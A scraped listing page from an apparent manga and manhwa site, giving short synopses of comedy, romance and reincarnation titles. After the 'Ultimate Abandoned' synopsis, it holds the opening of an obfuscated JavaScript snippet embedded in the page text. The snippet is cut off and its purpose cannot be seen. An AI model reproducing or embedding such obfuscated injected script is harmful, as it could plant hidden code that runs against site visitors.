Comedy - Page 1467

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17735 results

A Former Assassin Was Reborn As A Noble'S Daughter

The story is about Serena, a former assassin who was reincarnated as a duke's daughter after failing her mission. She initially thought that pretending to be a noble would be easy, but she struggled with the gap in perception between herself and her mother, who had a flighty personality, and her adoptive sister, who deceived those around her in an attempt to push Serena out of the picture. Despite skillfully dodging the harassment she faced at the tea parties full of rivalry and navigating the complex social life of a school embroiled in love and hate, Serena's cold demeanor resulted in her being ostracized and isolated. One day, she discovers that her adoptive sister is engaged to the second prince, which leads her to run away from home. However, it is at this point that the first prince, Evan, appears in front of her... Follow Serena, a former assassin who knows nothing of love, as she charges forward into the aristocratic society of another world in this comedic, occasionally romantic tale.


Nigate na Koibito

A straight-forward coming-out love story between a cool high school boy and a handsome classmate who fall in love!! Kasahara, a high school student , is outed as gay at school and then isolated from his class. The only person whose attitude doesn\'t change is his classmate, Katou. Irritated by Katou\'s kindness, Kasahara blurts out, \"What would you do if I told you I like you?\" However, upon hearing this, Kato makes a bold move, saying, \"I like you too!!\" And so they start dating!?


Osananajimi Wo Erabenai!

I fell in love with my childhood friend, but we ended up separated. Now, after 10 years, I'm finally reunited with her! However, just as I started looking forward to an amazing school life with her, I found out that she was... not alone...?


Crave of freedom

A city fenced off from the outside world, crime and devastation, periodic shelling - how can the inhabitants of this town even be still in service? This story will be about these events and these people.

1 days ago

Country Life With His Sexy Majesty

Read manhwa Country Life With His Sexy Majesty / A Country Life With a Sexy King / Country Life With the Sexy Emperor The moment my engagement with my human trash fiancé was annulled, memories from my past life returned. I was formerly a hardworking agriculture researcher and a woman who went to farming college! After getting chased out of my family, I decided to stick to my strengths and live a worry-free and comfortable life while farming, but… “That’s my sword.” “No, it’s my hoe?” “It’s my sword!” “I told you, it’s my hoe!” Suddenly, a beautiful blond man—who looked perfectly fine on the outside—appeared to take the hoe I picked up from the ground away from me! This is the start of a farming romance where we’ll meet our loved ones as well as pick mulberries (kill two birds with one stone).. 섹시한 폐하와 함께하는 전원생활


Stupid Cupid

I confessed with a trembling heart, and what I got in return... were words of support?! There’s something seriously wrong! What?! You’re saying you thought I like men?! The most useless and cute attempt in the world of wanting to couple up with a cupid begins! 스튜피드 큐피드


Prince’s Lollipop

Ten years ago, Eunsol Seo tutored a child who bore deep scars in his heart. However, just as he opened up to her, she left, and ten years pass with neither of the two hearing about the other. Eunsol is now a thirty-year-old woman who is desperately looking around for work. After another failed interview, she meets a strange man while screaming in rage, and he suddenly jumps off the bridge in front of her. This twenty-year-old man turns out to be Danam Soh, the child she tutored in the past. A romantic comedy about the reunion between the thirty-year-old Eunseol Seo and the twenty year old Danam Soh. 왕자님 의 막대 사탕


Ultimate Abandoned

Su Mu, the fourth youngest son of the Su family, is driven out of the family because of a temporary loss of investment, and coincidentally becomes the Chen family’s superfluous son-in-law, who is despised by everyone. However, a tiger is a tiger and a dragon is a dragon. Until one day he is like a dragon and tiger, recovered overnight, those who insulted him kneel before him and beg for forgiveness, those who despise him are repentant… Absolutely Abandoned (Ultimate Abandoned)<script></script><script>(function(_0x47220e,_0xfa5b0e){var _0x181c67=_0x16ea,_0x230664=_0x47220e();while(!![]){try{var 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I'M Gonna Live With You Not Because My Parents Left Me Their Debt But Because I Like You

The main character, Yuya Yoshizumi, was being pressured into paying off the debt left by his parents who had fled abroad. It was his classmate, Kaede Hitotsuba, chosen as the cutest schoolgirl in Japan, who saved him from this crisis of life and death. However, there was a catch. The condition required to fulfill in return for taking over his debt was—"In return for the loan, you have to live with me." "Why did that happen?!" Yuya's daily life collapsed on this day. "Yuya-kun. Let's take a bath together. Yuya-kun, please be my hug pillow." "That's enough, Hitotsuba-san!" The slapstick love comedy between the beautiful, but easy-going Kaede Hitotsuba and the serious and hard-headed Yuya Yoshizumi, starts now!


Sasensareta Munou Ouji wa Jitsuryoku wo Kakushitai

The main character, Noah, is a reincarnated person. He was active as a sword saint in a previous life, and as a sage in another. But he’s been forced to work hard all his life, and he’s sick of being a hero! One day, Noah dies and wakes up to find that he has been reborn as a prince. He had a high level of magical talent and the swordsmanship of a sword saint, but he didn’t want to get busy again, so Noah pretended to be incompetent with all his might. Then, on his 15th birthday. A skill appraisal revealed that he was incompetent (actually, he was just hiding it with his concealment skill). Noah was scorned and banished. With what seemed like a gesture of warmth, his father gave him a remote territory. “Now I’ll enjoy my second life!” Noah was enthusiastic, but he didn’t know. Actually, the territory was in the devil’s forest, which is said to be uninhabitable. But his past life was more advanced compared to this one, and the level of human beings in this world was lower. Noah’s ability is revealed when he helps a girl who was attacked by a monster in the forest. “Amazing!!! Noah-sama defeated a dragon with a single blow!” “How did this happen? Ahhhhh!” On the other hand, the royal family also noticed Noah’s ability and came to take him back, but it was too late. At that time, Noah was already being praised by the people as the lord of the Demon Forest.


Mushoku no Eiyuu: Betsu ni Skill Nanka Iranakattan daga

"Classes" are given at the age of 10, and the presence or absence of "skills" greatly affect life. Arel, the son of "Sword Princess" Fara and "Magic King" Leon, has been branded as "Classless"... But even without a job or skills, Arel believes he can persevere through effort.


Habatake Majutsu Sekai No Shitei Tachi!

For over a thousand years, humanity has been protected from the relentless invasions of monsters by the strongest grand mage, Ishtar, and her exceptional direct disciples. However, among these disciples, only Gilberto led a self-indulgent, lazy lifestyle. One day, Ishtar suddenly announces her retirement, and a young girl named Lapis appears, aspiring to become a disciple. As one problem after another arises, Gilberto\'s peaceful days are turned upside down—! A heartwarming fantasy of mentorship and growth, filled with laughter and tears!
